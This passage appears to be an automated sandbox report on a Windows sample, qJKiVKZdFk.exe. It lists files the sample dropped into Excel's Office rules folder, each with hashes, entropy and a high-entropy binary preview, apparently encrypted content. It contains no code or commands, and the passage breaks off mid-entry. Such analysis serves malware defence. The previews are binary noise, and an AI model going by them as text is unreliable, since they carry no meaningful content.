                                                                                                                                      SHA1:15341C4CCD79750782C2049639439C1A62C2D9C8
                                                                                                                                      SHA-256:6BD62FA2A07C8421780FA6FBCCB61BED94B436A48B2A5007498EFBC22F7B11CA
                                                                                                                                      SHA-512:35A7B0C47947FB1928177C729184A084A372808AA322684A9635101720DB58184F9A233B288DAC8C1CA176DF901BF3824F0665F7F63733F49737F2A05540DBDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml(........i*.l....>............p....yL.<..?,.".<=..-.E2o....%....e8..+;..iH....h.$..Q...Z.[..K..cx.EDl".|..D..f...2.~pA:...RD..02.....|r-.Bm.l4.<$a..D.$...bl.d. ....O..[....s...%.<....B......\.L#.o{.\...:h ...X..^.BjM!...^Dd;.gKD[&....}{9..P......k.....".zXZ..b.^sZ}...)1.....~B..A....%2.d8.(`L.=.A.%.A..@.Q.`.Z.E..C.t".6K.t....y&.FGP+..{..o......&.\.?.t.\p4..r@.A.........2..."(.B..2.....p.#...l..Ke...#....2.P......+j....;.#.[.....%.....7.U..N.t......s..Uy.<...]>:...;.7."....... 7..17.ng.=[X24.......Q/...h..?.*K.q5cI<.A.S.a...|.l.W{.Y.X..{..)F.......UY.o.!.-..x..V.....G..f....v...9......F..fE...h./k.z......e.......@...{..e.U.D s.w.C'.\...,....N.ShZ\.....s..E.W...C{..9.....%d..[..`|...z.A..R..D=Aetp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule226009v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):859
                                                                                                                                      Entropy (8bit):7.756331764926677
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:hPDFyV2BpmMX9NtWMNa3K6xNB0EJ6B7bD:hPDVwYBaa6jBpQD
                                                                                                                                      MD5:9207EE575E116D2DF8BD4A6BB1C4B85C
                                                                                                                                      SHA1:6B723D100AA9F364C01D6DCEE87B2229E8B9AB67
                                                                                                                                      SHA-256:86C7E748518D9D5F81BFBA7F09F7078454B9CE0CF3A4C70226172E22F8AC9581
                                                                                                                                      SHA-512:97A76E9CBE50DC499F900D86226D64B8389B9F0726CFD8C7FD2A578645D81B8DC5C502AE4705DE2B254584A9A53C3033D1989D5BD5562B24682C46F8D3E5576C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.K....Xk...;....._.`E.e.j.7.@...G.Z`..<....^.bj..@.....9...70=y.uZrH.........B....TR...u.. ...;.@..Pg...])4...w@.N.z....:)..o.....p......'."}.`........G.....6_...\....L.M......k~...OI%..5.p.O^sN].|.U....0I=.....h.....j.d'..3....k#......j.+w(...H..~@.#.o+r....-..b_ .=..l.}....R.p......Si.3...A......du,..B.9{i...FDwl..O...d..(.#..|.o..........".w.]a.....w.".N.?..Q..'t..l./h.......g..C|...1mus8. ..i..3.Zu6.),:..+?f.....q....\.3......XN.)....`....he...r.k......X#:....et"$.x.;.&.w....5..;z+2.b........w....D.,.=.Y...[a....Z..mkkr....'N0X...M'|eG....."*.^B.L.<..}...551.Zf-..X.qS.X.5....6...\....sJX...h8`....4[x/A...rF.J.J.Q.....d:*..m.n.....4..I^..M..>fV..iz.Rm.....R.q.`...KC..:R.+.1zK.[=..5.cC....1.....h.B..IG5k......L..BX.w..$#K_......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule230161v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):911
                                                                                                                                      Entropy (8bit):7.757589126755772
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:L5VzOokwJAfoTFi5VOIzt8qwCWWoNQmY1kNy/tUbD:L/OQM75wIzGqwCWWoNQmZN+t+D
                                                                                                                                      MD5:1E9BF8B0726D5C5A1453B9EC695BDE9B
                                                                                                                                      SHA1:22917BCE673DAAA08518E154491DB721198F1E7B
                                                                                                                                      SHA-256:E76DF5E718A46ED6169F020F6AEE28E7C4BD2E7536A0172A08F74A2F1F638986
                                                                                                                                      SHA-512:84099E399B645F77D64DD81500293E4FA95F6525F799081C6BE57F4821D7618C7BDC8F69F40F29E15E6EC4E467DB0C4DB7F66B3E53BB011B028E48E4397A76E6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.&'#.o0......g..]..w...tk..O..j.u.':.r..N<.p.v>......G.2...Gj..-y.2=..]....<..*.@.Bg7.......M{>\.)2X..]..|..:..b~@{tE.{J..[.<...0.f ..[#.....V.`..%.U.u o.0.T..Q........_.L..y..a&\pe..&...t.La_.G;=E......0....c.X.Q...._$.1....0....h.hpF.`*Lj..!.==...(M.|%..A$.{..z..a.....g2.y........H..&.L........%.y......i.....a .(...b.!.Q5.d...84..G..E.M..2.W...A...E.a..g...LR..&_..q.5..4.8.J.f.Z.....m.Oh.j...../.....;.p.t.M~.kiI.*#\....A.K.....I...l.U.`.u.....U.[.K.:.Y'O..5....Z.....l.`^!\......DA......p?"mX.f....3..[.."...~]j]n.....:..g...@.gq.;)Y..@h...6..1..]..x...H;..)..(.z(...r&....B.7.0|ai...DF:...e.....K..-.a.m?.p...H....T.^..7#K...*ys..~..}.p..Q.J.'......-ZJ.Y-.bHB(\...o.0r.E*t.h..EX.St..z.J..wc....p..uP..u$L...{X.......}.S&.hI.r...L.@`!Gf..-.^.f W..L\A...F......j.d.tP....M.ltp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23068v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1018
                                                                                                                                      Entropy (8bit):7.793437532578486
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1k8ioegLNRF/JzAYIE7K0GthP9g2VZfEoTpwvQIE+wbD:1k85lLNjRIZXS2VZdEQ5+qD
                                                                                                                                      MD5:DD33DF1F0015ADCB8D5EA808C8D4001B
                                                                                                                                      SHA1:3B509FFC9BCCB97C6B29E5F28D359C2891710410
                                                                                                                                      SHA-256:B861EC2D39097522C736B533C3506D987C4F1DB96C71E36846D7D5C57BD8C5A2
                                                                                                                                      SHA-512:A133BAA300DCB678C81C3C01566E06B8B24C3A4004761F1193309015288AF465E610766224682AE107D32A3863269F645B5CDAC103C239DD1A58F34A0003F7F8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml'.#.o.N..ag@..^p.`cT..|^ET2...........>.Lq..-^.AO.l..@p....R)..wm.....Q...w.[.rSH.F.9.AP.......~`..U....D...O.x.h.....!Y...g...Z.s...61>{...".d.T.1s.&.i.w....D..W...|.........2..F.....{~.Yo:z<.............Q.B#W.8l....Fct:.'.T....!0o...y.*......8H...P........<..m.i...;.i.q..gM;I..D.u.G!%g9...j.fas._M.x.x=g.H..c.,....Y..K ......M..X.L...#..J.-Z.F.g.Q.3.....T@Y..!.+.V.1[.A..XJ`..b;.....C.t.~Z..c..m2L.8>.I...FS._...D?........)...A.E.<'.t .*&.).......rr...o18.........L$U..YQ'x..|.A.....)T.].u9....9.]..u..}.R`9y.A..n.f.Bg.......4YR.OhDL......n>(.h."!<..-..c.5ZD.Y.0..$.q...@..MHhs..].^..D..;.KI....87D4.S...Q.....Ok.V..2>.f4....\,..D...;jk.W.40Q.R.;/q.o.......;@..4..........O.....x!S.+.#...].z.r.y..q...+k1...\...T+d..,?t........$......@:.$...~.%.F.........5O...q.ajE.V+A.y.6...S>G.G..E.v.....$..=|&...k..MMZc6.+.s...<......?..N*:&.L6".e._D9.!.+.........O.W.Y`...=3G.........g....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23070v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):758
                                                                                                                                      Entropy (8bit):7.710472112521404
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:hujXTK1/uvaU17P4v/lM6np1JapqeD39t4GtOYM/6jOSBb3UMKAs6A/NfoukIciD:uXTKpuvxP4v/moWp9kYMNSAAszNfLbD
                                                                                                                                      MD5:BB9EA1D15EBD5B143EEE5522585F8CFD
                                                                                                                                      SHA1:41E4543AE0E726E5FB639AD679B239243B4DB5CD
                                                                                                                                      SHA-256:40DCC1481D029F890634461A9BBD7281AF4FC22ABD837B3BF945E4FAA6C23CB7
                                                                                                                                      SHA-512:4C50F3A1A7AD0AE265A2F6EC80561CC81C80B714BD5A6F628B42F8FBEA65ADF645F268217A27A12A0896D6275FE7F9568F49B614B1768F2C689FCA542733FC94
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....E.u.+..e...1.._.3p...j<.L..C.....~...!.B...|]q_*p...n.{.AN1.V...9....<.In....yz....ZM{..;1..)p..j.h\=(.4=..2Q......ry...MJf..2.AH.Z.._=u....c|`.~..q.&.F..{.'.uV.B.c.q.[.K..!rm.....R*.L...oP...5)...s............+#.Zx.l7..K..kjtd.8.CV..r......1.?....v@:..L&;..T...U..&..A.z.x.T...1.5G?g.uPh...s......`...q.:.-7.4I ....}..;d,..`.4).rE>......+*..C.mW.%;.u.......p.p..j_.8..J..?dT...T5rf...u.t<\.KX.?....}b.L..1e~.~.s~....g....!.2..Y....S4...f.Z.....?.._.3...g.y.`m5S..[=..F...........4m..z.S1..<V.(h....^..b.....T...[.S.b..Z.?...(.......O.$..D....7..JqA[..|]..........|$.[..........tx.......-.P..=....9A.f...L.:..>+3.........P........5O.Q...K...6...-`Q_tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23120v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2643
                                                                                                                                      Entropy (8bit):7.9280241088225365
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MA35cvDceD5u4Ibr9yDJ0UFHEFQl7F0pMzs+hQWhrN7FonJ+03BWdpz9sD:Tc7ceD5NIFsJ4QdF0qYmQgK+Ogry
                                                                                                                                      MD5:E4AC401B9933511DC906E831507239B2
                                                                                                                                      SHA1:D424C7C18435808F088FEFE78E5DEF1C039945F4
                                                                                                                                      SHA-256:CEE61F7AFBACF08027B43F8183553877A1A08136CF5C3F25B49EE5825D87DB64
                                                                                                                                      SHA-512:59227D213EDD86B50E18CA6EFBF57B8114747358D5116AA723E9688E1E431F8F48A5A3C8F55A74AD149477C6751AB55118860E6DEA5A8E48147BFA4BB7523130
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....G.t............h....c[3.5.^....>y^h.{;...z...^c..W....^f.z...v....U;B..X|.#.....t.cRU...&.G+.1....,..Q..%.f .X.<.Ra..\u....%.<.q.Q~..h.........A..2S..E....Un.........H..$D...p.....6m.}..MO.J.5..+....#...:o..4%"=...>+...\._...x..uj5.:....v.....h.."......2.+C&*_...m.].M.......i.89...#...."8...d..&D~.....z4..J...../T.M...s\..B*..v$C1..[.'x.hc2...y.v]..mw.....o..l.go0..M...h.I........_.!....7...i.S..r.p..H6.@......f.M.8.V(.f}..........C)....l.)]..9b.U..&....\..^..iQ.....}z..:.....2.&..p...QD.....q.....n.....z....F...]7c.I.....vZ..g=eb`.....F..qh.....'.J.*..kE ...;..U.S4*.R.,C.C.z...|....~"/dZ.......u..!.I.X.....8...R|5{|..}..._.!/..T?....Q(...6..E.. .....).....0t.f.a~........i....p..Bjk4QiU.p........M."..^..N6}.V..a...#..-.$` 5.".P.L<.....Ey..S9.D..w....\l.........(Dy.M1wi..e.........l~.^.`.Gj..#..[....i.P&n.G..Iv...&.e.......0s..K9..b...T.I.Z.h..Sy..%...i.a...n.H..514....nb*........0...S.%..1.61"S(.........mB..R..9.F.+).R.t..nN#..t..$

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23122v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2238
                                                                                                                                      Entropy (8bit):7.917393797470507
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RhlPcvuxchpO3/2NpviBHOjgBOW9CtbUg/00vy1wquOKqmFq/JvMVD:RyuK0u4xY3Q6by1wquOpms/et
                                                                                                                                      MD5:86A0F298080AB0D0C43C692E80939FF9
                                                                                                                                      SHA1:BC8780458580BBF6B5018CECBEC66A6B54875557
                                                                                                                                      SHA-256:2AAE6BAEBBF20012FD18641ADB9CF03F6169F08E6D71A7EF463890833165C8E0
                                                                                                                                      SHA-512:79D4122F404EB6BA4FF6EE9FC56D992F7000032F17C5C76392FF1E9120B161920C9928FC0FC2476BD45A407577867A96FA2D4BCAFB13709394A4CFCE5FD932C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml$._..08..PZG2.^\.Z.mn......."M..v..F(DS.;.....k..).~@$..8......i...(....t.8...e+...6,..z....@.s^`..e.7G..E.A.K.9..b."mi.$....q..x...F3.X_.....%.^.O..g...~.J....2.E......(opLU.....,.D.1.R.V.....6..H....F.....m*...l..?...B0....r\)"......|B*.....9"..]....R....\...0U.D.vA..p..s..c,.}..e...s.....Ef..c=Oos..5.:.*b..I`.....y.S_VH..L?.5.Ry..9Mu0..o.>....p.ml|8.C..K..E..W....P..n.^..p..W.{.>.*F...*...#..+......k9..NA.UH..F.7....}..D..=N\.~5......Z.K...stt..8/.....9..G...$.....J.t........;...?.2.k......m..0..B..I.r..(.......Y...5.8.O[.a.......LZi.../..*(g.kr..EN.\..!`..?.3....E..Z...>.a&Z.\.D.<...T........JJ.......,.....Y..m..!.x.Z.@..y..2r.do,^KXCN)m#._....y..t$..)...~.>.I.b%....)j.>^Y..;.S.J.....!e...H1..c&-.B.].].Va..-s/..Y..n....j.V..Z.lL..9.....n..X_h.._.....R.j.qD......)L.cq.is.3.............r..aDh.F.C..9.....*....8.M.Fw7...3>.}.e-WNDN;.u..jx.m.<.........dJp...Z"..v.....'..}.....<..,(..R...Q.F...!...AR%.l.A7....}j./......B.m..`..Xl].

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23123v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2345
                                                                                                                                      Entropy (8bit):7.920603317640371
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:r4EGjgwIP+lFna9g0eisR+PPhq9rdjfXE93SRAOMgAq+tbk4DHOgM/D:r4EGcEaVjg9r10xkATjbkeuJr
                                                                                                                                      MD5:8ECC252183AF9CBD41AE6270FF89B2AB
                                                                                                                                      SHA1:13D115C09A595013E1BD371022A29DF6F3E35944
                                                                                                                                      SHA-256:39F385C4B3EEC4821E6C1F854333BAF5E5CD0F23FD74C179C5868E3F48D2A7D3
                                                                                                                                      SHA-512:8FFBE0B418F360F25B64EAA4440FA8F7482062234D7E067F0247F3F73D7AF04AC30CAAB2672FA870E44E1BBAD1DA7B58244BFC51A341B1E74875A207EC593A56
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml!..D.U`...t.....(Z...?....[|WC......\...^....rlL.!>yu^/M..%..6;.1..I.$.<KE..<....X.~U......E9...\.+..H.GN..........3H...d+79.$..~L..W.T.......E......$."8..._"....G..!@~.3..4..x6I...y..?.......g.z.h...1.I.Ip...k.G..H~V....|..Q0...U.|._..^..e.[.3..0..5vSD....9%7^.;..de.L.z.h.T.<.s..y.w..hIE..{w[z.m....@.,.N.M...U.T....Y.-.....K.q..;7G6$...-g{ClR.;...c.Y/.t.V.....)...3.$....<|'.....v=..E..9..d....i.V.E.r|...~W.r...3z.....dI.!. ..Z.FS..s......S......eQ..f.,3.,......h;4..*.{.7....=.P.Y..?M...{.G....[C..;6...34..{."9.O~.v.(;....)}..6....OF.>.&.m....KP........2uF.P.%n..Z..U._....|T.V....v/......wr..J..:~........##..0y.....t."e......@"..j.G..........S.5..J...:~HVV.n..+^...._B^^....|..W/./:~..j.3.@[.1...x...1.F.s.a.....~.dUdv._.O....2............Q7...UX.%O.....>!.EMm....D.F.t......!`.,.S..%..............+(k.h|%=nt..:......v_-........o.w<..saB.t...o.V.1......5.......G...!....];L......6S."#*".N..e.%.[.!{.d..U.......T0..,..l........y!...`..(_V....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23124v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2374
                                                                                                                                      Entropy (8bit):7.917538853801116
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:w5J+s3ikAzsTk9O3PoG4hpZj5RNEOQiie2HBBDt2HuwRyTf68GEEQEWuD:w5Ms3iCTJH6RNEOz2HrDIHHyLRGtQNW
                                                                                                                                      MD5:491F8901EFD7D5699E6A887D89D048FA
                                                                                                                                      SHA1:3A0B68917F5BF3037BB18575147394223498AD23
                                                                                                                                      SHA-256:6B612964BCB58FBEF644A71BB1641A80CB73BE56BF0190BADFD059B2AC3CCAD1
                                                                                                                                      SHA-512:0B20F1873CEC05C0562F063CEB1B8938908F2F5CC6E8A5F6F06D8740FE267A2CB69894D6147DE757BBA6909731DF287F62EDB21C616516EC9EAF2375476FE559
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......[..K...v.11>...]..f}".. .-....4.}....78..(Q.N...Y.*\LI.$.m.Y...F.....p.6......p...a{..u0^-..S..p....S.....i...+.....8py.+..R+...8.BkM..`.Kv......T.....M4}..n...1.}n.E......bf....t...S.KZ)yA.s. K.T.....N1..4.!.t..[..7..6.k5......?2.W[..x.1..M....jo.8.5.........*4.T.`oa..6&..ZI)....P.......f.).Y.c....s...\x$..s..%.\v.o\F..Q.V)....-|.>'C2#S..7G.e......y..O....Q...6.Sts.....]g?.{.. ........?.~...$&..,}1...>l.|..S...T..K.\J..j<o.%..Rm.....k.;|$.xs1+.a>.>..-.C..N.E*..v...h.c...P.!<.&.o..+.{.D.....=P..f..S}..+.a..o..`../...EO...e.TnG......7.(....}.R.l.l.j........w...bg?.\.Wo.3..uw.dq....W..G%C..^...H^.A.G....N..~.H...Et..E..C...Nr.lh.>.....AS{.....d.....q........j.'%.P4%.u.!.w......GS..1V..h.U..*..~..>...,$.C2he^.3~a.={5....M..Ow.....F....3....l....u...M.".Q.q}..j....^.(.......u9.>y....~.a.sh.......}./...B=.H.].b%I....pZ...6...N..fKZ.&.E.%.'|G7...l.m.Y.w......S......D8..0...yW_dO)x.~a.Ij.........L.{.T.0......Q...,.......E......4AR..!..}..1._.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23125v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2224
                                                                                                                                      Entropy (8bit):7.898087346449139
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:B2dXYZNUPUiQpDzPn6GVLY4ZS2ey6ttrQ6lrIixW0VDD:rn6uLY4ZS2ey6rrQ6lci8i
                                                                                                                                      MD5:68F5A6724E2B51C87A09FD34C9E4DF97
                                                                                                                                      SHA1:2143C14A0382FB5CB9BDEE094EDF6DAC806AB473
                                                                                                                                      SHA-256:9A3A0444457A7A77D99C37073CB82F03EC4D5A3C36681E8D0E8F530CAD9AE0F5
                                                                                                                                      SHA-512:A3B426371CD80D8A8A36E6FE5641E98D018983941F8A4498519C6B31089560C972ADB44BB9DD41B7F64C3BE89EA8F6B2480659AB7BE597F08D5C38014B6656DB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.A.m6fx:y..Xy.....a).U...].~5z'..Nq.."g...>i.1,.U\n.l/.A...h..n.WQ...n.J..%.8mv....x.i.F......w..c..oG.hg....54.?.Q4......^..i.a.o*..`...i4h.Q.P.s..W..t..b........w/...W.$....R}2P.n#.uEj.f.1....~..y..2.P.,[+x^s}..E...q3..N.ywG..e-.< ...xZ.$.... .@.;.!...#.2.jX....$....V|lPh[...%.*4xW6.(.2..4=.M..._PRC....m..........F.6.a^._.^...N....<G...z2..tl.].F.W..p....*F=L......z9E/0.R....0~..R-.hO....[.E........yg....#....{....^.....U.a1.. ...A.hv.1.BX..j*.L....Xy.p..8..P........V}.{..I.x+.2.yC.h.5..B.+.Q.}..(-..7.../..%...........f.......ij....Y.....2..al1r..DCW.3;3}U.8..B...L..`..Chu...iv.N......6....By...S..Zv/..A.0e3.y.F.$..V......r$m..v.4...d.f.K...yi.PF.(. ^..7akh%....v.iB.b.Lc.Ty.t...2.^..O....K1..0..6..P3......F.^h....^..w.65.V(n<+`...).o..p3.-.~I.......Jg%=6B x..^...E.\Z.-..SUv....;P...+,cp\....90.B.%.i... ...>.....v....`.czw.{..!F.z...3..v Yi.~..-....'$D.\~..D....o...v.Xr.{...S........6...--U.K.,..@m...p..S.v..t..o.v.+.'.oyO....AVj..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240005v8.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1547
                                                                                                                                      Entropy (8bit):7.853712905942362
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:+nAJnaw9BS+ZkQWDpxJrJmHNYGFFl+Px2B7WKjcrsi4mRhuHyRwab8tWxHbD:Pn++MNotxzdRcrTR7WyqE7D
                                                                                                                                      MD5:8C6911DDFD4AD639D032E3B660ECD708
                                                                                                                                      SHA1:B7DE357643192992D63A9446B3162E95F85F7862
                                                                                                                                      SHA-256:462DC27D473FB53C6153AEDAFFBE7EEAD16CC818A78BF24E344AA2A5F2EB27E3
                                                                                                                                      SHA-512:622B447F0F110791EB78BB04AB8CBACB72525D0B3E4FF9AB9F22FA92600650556B44B971AD42FD4402D6C03B25ECA03161F7E78981FA9169ACF51B47227A9290
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...'{)...}0............I..`.......3......|Ah...U.S...(E.8.=...5..K....9*... 6"K.....p9lU.c...y$N\..C.ec.I..;$`.^.w....LlTZ..`...W........a.`...m.u".g..SB.^N......I..56...u`.]...NSV..x.F.1.QM.l..R.........c....cD..S..=<.{..v...zW......DD.En....?..p....<.s_g......Dx.ZN..^.....N..^.K..(U...-.._@.j.9.R.C.a.lZ@WW!...W.-......}.....4.{. h...f...|z.5.E.T9j.......}a.&...G..\.@a...*..Du..=S.j..f...l.u4.0...crQ....Ny.ZT.;L...N.l..r.....0.v>.........?...@......).o&..Z,....3...}..YS...:#%.Z....u.. .r.|.Z.V.9>V,....._Vk.X?g..8..........:.F.4.?...:..+X.....8.......f..-...+.!oN..;.R....T(..49Yw.....3...8)..Ncu.....W..../.`.@B7U...a.l.....e. ...M..Ia....`..a..8..\.nU+...Y.g';.8]D...>.5h.T.1#.V................AI..0 z.A..m.7B...0......C....F..B...u...V&..E.......2.|....er".o.....G....].....N.2W3oU5.$..s..U.T...}KC.a.g_a}.;V`+............-.G./o..9.U;._v...k.Y..c.6..=s.'...1.Gh.)Gt\.q;.w..8>...},".(..+.(..%...._;i.*fWLJ..)...$...K..?P5.M.p...;.Iy.2.0./.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240006v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):808
                                                                                                                                      Entropy (8bit):7.681516140434128
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TpFjC1V0we4BZDlEQHfQn3dcvVBp113mJ3nANNYfi46D6xAcnV0ovIvMRb1apJGe:TpFmbLBZ4n+v9e04RxZn191ap7bD
                                                                                                                                      MD5:D8FF4C8AE32D5219573AC743F0FD9100
                                                                                                                                      SHA1:0AA508D2AA3B402427F8FC532E18FE3BDB610A9B
                                                                                                                                      SHA-256:702BCF62C4F259564C6AA61858DF4AA076A1DD568BC040D9051031CFE461C3D4
                                                                                                                                      SHA-512:91BE1D9379E3B19A38C46E5837405246729E85EC33C5E045E36262BF53E8A81A509091653C1A6C4DBE7C4D34D1CEB356CC56DA890632F2C708ADF3360784D652
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.B....;...o{l.....y.P8....,L...7..F.;1?......7..e......a..yZ.H.q4XfG}.&.$..b}e!.#Y..Ko..9...w.Z}e.Ay..m.-1...z'J.d..eZ...i..4l.*ct......2@..}:.k)..B.q.R.2.\_...V0.=.0.C.l;.7.Bw.\...5.......[k...41.BX..!.-...e.....z..i....b.........I.E'..;..d..0.Cz}v........G..Z......`.m.......B.;q...wm.x..Rn.o..5.\Xa.Z.6.m.k'.....B(#n.qJ8.....C...DO.......%............q....n?'.>.".4...{..N..g..\..q..Y.o.m.......w.c..<. .}4.*}.xI.}I.r9..a.w......U.9...B...q063...:..@(.IExBP..T..Ky.......Hb.\.8].5..+x..m.\..J%....@.*. ....uBT..w9CZF........e^.~$.....sCb.<., ...<^....?......Ad....... X.....V?.z....)%.Dx....%...jYt.+Cs..!..A....B.g.Um..6*.Z.DF.8....q.4a....1.?#..y.8...[...'Q...13#...-Y5t.$..)'..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240007v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1823
                                                                                                                                      Entropy (8bit):7.896431035257841
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:njRk8b7+389LBahpRa3oFWm/eoyKLR3+y/UtZeMLKID:ntJb7G8Hahpgjm/pR3+y/aOU
                                                                                                                                      MD5:4DA9D711B26AB79C8833715BAA3BEEC1
                                                                                                                                      SHA1:9EA4391C9B7B4C299525A77019D4780286CD2B7D
                                                                                                                                      SHA-256:6767F040CF973B4E9CC8E8C8EF8DE585F468A2CC1A910A57FB1686EBC2937389
                                                                                                                                      SHA-512:3B4808882C082EB694F5432611A333329BFC71C3EFA7B9D76369C5DC0259E35F1B925F36821FD7CB0C957FDE332F99A96078B15E64F753F48821D1BA28A49B97
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.......p*^.V.o.1.M,.Ig7..l..y..&.c."..X]....s.~.X*R..=.....s.}..a.J3.a(...[b...E.C.W9...I.4.....f......X...aPd1.s..E....f.c......<..SImq..$..n...7......j.n.2.ZM...Kk#.I\.D...t.....<.v...+g.m..\..q.......2/.[..#....$lJ..l.....mv.,..K...GS..o|...Y.gAH."..0...V..;.y..<k,..4_.R5..<T".q.......'u..\........a.+{.ERj..-'=P...+Y.s.?.2....Y\6.W...N.]...[..t.d#].:8....'...tN4B.B.O.3.....d...g..%....?.e...2...n.4..|Yw..8)...._.....d.c^.z$....x*.F*....W.DxN]..n2..y`.V..NpxI..C..lz}`...~[.W...S/'..5.@9.....9..W.?8$..:..~..B.#.`...o3.".#..Z.E.Y..c~..HR.v...|p.l5$..6.. .+.Q...aQFF04<.\y.......HN..u'{(.r...=.n!.t=...]7....x...f........1..E7v.8.c;...*..Z./w:F.O..`S...Q/gp.e..p.@...|;.EK...+'`...\+.....d.=3.a-.F..Y.4.M....S.m......g.1..>_r..Mu.Z..........~.K....5..B....l.o.y.....].97n..>..u.7.......`.......l.^.P".`.*...F.-...:`.3.>a.-../....qz.Yq......4....C.&.Q.g.R..?.L.3.|..J..8.R.Q\.#..Xp......Hi_FT&.3.....k1.3 ........M....)X...._..k"....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240008v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1136
